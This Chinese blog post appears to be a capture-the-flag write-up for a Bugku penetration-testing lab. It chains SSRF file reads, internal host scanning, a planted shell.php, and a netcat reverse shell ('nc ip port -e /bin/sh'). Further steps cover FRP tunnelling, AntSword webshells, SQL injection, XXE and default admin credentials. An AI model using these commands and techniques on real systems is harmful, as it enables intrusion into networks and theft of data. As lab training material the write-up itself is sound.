bugku-渗透测试3

文章描述了一次网络安全测试的过程,通过SSRF漏洞读取内网信息,探测到192.168.0.10网站可能存在安全风险,执行命令反弹shell并利用FRP实现内网穿透。接着,通过SQL注入和XXE漏洞获取更多数据,并利用蚁剑进行远程控制。
摘要由CSDN通过智能技术生成

首先ssrf读取文件url=file:///flag ,拿到flag
探测内网主机
在这里插入图片描述1 2 10 138 250 的主机
在这里插入图片描述
读取/etc/hosts, /proc/net/arp, 拿到内网信息
扫描内网端口,提示192.168.0.10网站被黑,可能存有shell.php
在这里插入图片描述利用这个去执行命令反弹shell
测试可以出网
在这里插入图片描述测试命令发现对面不支持bash,可以用sh -c执行命令
在这里插入图片描述nc ip port -e /bin/sh 反弹成功
在这里插入图片描述将frp传到内网
vps开启服务./frps -c ./frps.ini,目标上执行./frpc -c ./frpc.ini
在这里插入图片描述proxifier配置代理,ip是公网服务器ip,端口是frpc.ini中的remote_port
在这里插入图片描述此时本地访问192.168.0.10/shell.php即可访问到目标内网的shell.php
在这里插入图片描述
在目标写入一句话,蚁剑连接
在这里插入图片描述192.168.0.138SQL注入
在这里插入图片描述192.168.0.250存在xxe,读取/flag和/var/www/html/flag
在这里插入图片描述在这里插入图片描述在192.168.0.10里还发发现10.10.0.22
在这里插入图片描述
访问10.10.0.22,加上admin.php,进入后台,输入admin、admin登录
在这里插入图片描述文件夹管理上传shell,点击拿到路径
在这里插入图片描述连接蚁剑
在这里插入图片描述拿到网站根目录和根目录下的两个flag
在这里插入图片描述
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值